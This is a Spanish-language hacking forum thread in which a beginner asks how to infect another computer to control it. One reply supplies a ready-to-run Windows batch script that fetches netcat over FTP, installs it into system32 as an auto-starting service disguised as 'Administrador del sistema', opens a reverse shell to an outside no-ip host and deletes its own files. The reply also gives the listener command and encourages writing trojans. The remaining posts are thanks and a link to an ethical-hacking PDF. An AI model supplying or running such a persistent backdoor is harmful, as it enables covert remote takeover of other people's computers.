elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Soy nuevo em ayuda!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Soy nuevo em ayuda!  (Leído 2,189 veces)
Gorous

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Soy nuevo em ayuda!
« en: 23 Febrero 2014, 17:50 pm »

Estem soy nuevo y queria pedir ayuda, quiero meter un virus a mi otra pc. Es solo curiosidad quiero ir practicando y asi, a medida de que voy logrando cosas subir la dificultad, quiero infectar mi otra pc para controlarla o solo ver sus archivos y cosas asi. Si pudieran ayudarme estaria muy agradecido!


En línea

a4s5d6

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Soy nuevo em ayuda!
« Respuesta #1 en: 23 Febrero 2014, 18:16 pm »

Aca programe un simple Batch (.bat o .cmd) que realiza una conexion inversa, digamos ese pc se conecta a ti y no tu a el .. esto es para saltar firewalls y router, por que no es necesario realizar ninguna peticion a puertos o servicios en la maquina de la victima, por que de eso se encargan los firewalls y demas herramientas de seguridad .. bueno el codigo es sencillo:

Código:
@echo off
echo user usuario> ftpcmd.dat
echo password>> ftpcmd.dat
echo bin>> ftpcmd.dat
echo get nc.exe>> ftpcmd.dat
echo quit>> ftpcmd.dat
ftp -n -s:ftpcmd.dat ftp.servidor.com
move nc.exe %SystemRoot%\system32\nc.exe
sc create "Administrador del sistema" binpath= "%SystemRoot%\system32\nc.exe ip.no-ip.org puerto -e cmd.exe" error= "Critical" start= "auto"
del ftpcmd.dat
del mi.bat

lo guardas en .bat o .cmd y lo ejecutas en la victima .. esto es sencillo .. pero a medida que encuentres mas info sobre el tema te vas a ir especializando, la mayoria de virus o troyanos tienen el mismo principio de funcionamiento, este "script" en especial utiliza una herramienta muy conocida en el mundo de los hacker y los administradores de seguridad, es el famoso "NetCat", permite hacer una conexion remota o inversa en determinado puerto o escucha en determinado puerto.

Para que funcione este script tienes que conseguir algun hosting ftp o levantar el tuyo, guardar el netcat y configurar los datos de conexion en el "batch", estos datos no son màs que el host (direccion del dominio) el user y la contraseña.

una vez que consigues configurar el batch lo primero que tienes que hacer es poner en tu pc el netcat en un puerto a la escucha .. el comando es el siguiente:

c:\netcat.exe -lvvvv 6000

(6000 puerto, elige el tuyo y si tienes router abrelo, o busca info sobre el DMZ).

donde la opcion -l es listening .. (esperando, escuchar) y v es opcion "verbose" digamos detalles de la conexiòn, de lo contrario no tendrias ningun detalle en pantalla, con esta opcion muestra el ip y demas info del cliente o "victima".

ahi tienes una shell (consola de comandos, terminal) de la victima para realizar lo necesario, pues los comandos son los archi conocidos (windows) COPY, MOVE, RENAME, DEL ..

este netcat trae otras opciones, no hay mas que leerlas con el comando netcat -h.


a mi me gustan los sistemas operativos parecidos a unix, digamos linux, bsd etc .. estos ya incorporan determinadas herramientas como el netcat o tambien conocido nc.exe, no te preocupes todos los sistemas operativos tienen sus propias herramientas y no difieren mucho en su funcionalidad, cada uno se adapta a sus ingenieros.

si quieres ver un sistema hacker a lo grande, descargate el backtrack y grabalo en un DVD, luego clonalo en un USB-PEN o pendrive y curiosea con el, ademàs en internet hay suficiente informaciòn como para tener una vista del cuadro grande (hacker).

luego estas listo para programar tus propios virus y troyanos con tus propios exigencias, funcionalidad etc .. por ejemplo usar determinado lenguaje o funcionamiento interno del virus y el troyano.


Saludos!


« Última modificación: 23 Febrero 2014, 18:24 pm por a4s5d6 » En línea

Gorous

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Soy nuevo em ayuda!
« Respuesta #2 en: 28 Febrero 2014, 00:23 am »

Te adoro! jaja habia leido algo de el backtrack ahora esta el Kali algo asi :p voy a ver que onda, me voy a informar bien, muchas gracias!
En línea

Randomize
Colaborador
***
Desconectado Desconectado

Mensajes: 20.599


Beautiful Day


Ver Perfil
Re: Soy nuevo em ayuda!
« Respuesta #3 en: 28 Febrero 2014, 09:36 am »

Hacking Ético: edición en pdf para libre descarga
http://foro.elhacker.net/dudas_generales/hacking_etico_edicion_en_pdf_para_libre_descarga-t333839.0.html


Por si te aburres.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda Soy nuevo
Sugerencias y dudas sobre el Foro
wilder 2 1,981 Último mensaje 30 Octubre 2004, 05:06 am
por ¤ Nerviozzo ¤
[Ayuda] Ayuda para diseñar el nuevo Red Music 3.0 « 1 2 »
Diseño Gráfico
Red Mx 12 4,674 Último mensaje 13 Agosto 2006, 23:14 pm
por Red Mx
[Ayuda] De nuevo...
Programación Visual Basic
Powa 8 3,251 Último mensaje 1 Septiembre 2009, 02:03 am
por seba123neo
Ayuda soy nuevo.
Foro Libre
InsaneCABJ 2 1,590 Último mensaje 19 Febrero 2016, 00:56 am
por Arnaldo Otegi
Soy nuevo ayuda :-*
Desarrollo Web
Panic0 2 3,076 Último mensaje 28 Septiembre 2020, 16:48 pm
por EdePC
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines